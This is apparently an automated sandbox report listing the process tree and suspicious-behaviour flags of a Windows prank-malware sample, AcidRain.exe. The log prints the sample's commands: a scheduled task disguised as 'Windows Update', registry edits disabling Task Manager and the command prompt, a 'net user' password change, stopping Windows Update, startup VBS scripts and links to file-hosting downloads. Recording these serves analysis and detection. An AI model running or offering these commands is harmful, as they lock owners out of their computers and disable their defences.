| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\65AF.tmp\Acid Rain.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/enh1BYrI#N5sD3k_HwM4hL3-l-w2Ahb6uP2I-LyVeKgGO-CmfJA0
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\net.exe
net user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
C:\Windows\SysWOW64\timeout.exe
Timeout 1
C:\Windows\SysWOW64\net.exe
net stop wuauserv
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wuauserv
C:\Windows\SysWOW64\timeout.exe
Timeout 1
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002
C:\Windows\SysWOW64\timeout.exe
Timeout 50
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/ZXMSRSgb#CZCknCulyrMI41JcV-HN4mth37dIfpkEw6156NbD410
C:\Windows\SysWOW64\timeout.exe
Timeout 65
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
C:\Windows\SysWOW64\mspaint.exe
mspaint
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+virus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+speed+up+your+computer
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6312 /prefetch:2
C:\Windows\SysWOW64\mspaint.exe
mspaint
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=FBI+OPEN+UP
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=mcafee+vs+avast
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=smudge+the+cat
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+rickroll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.thisworldthesedays.com/how-to-remove-acid-rainexe-step-by-step-guide.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=is+safe+deleting+system32F
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/file/d/1TMp5UbzwcHprY7PhC9g58KsCN9EZVdBV/view
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+a+ransomware+in+batch
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
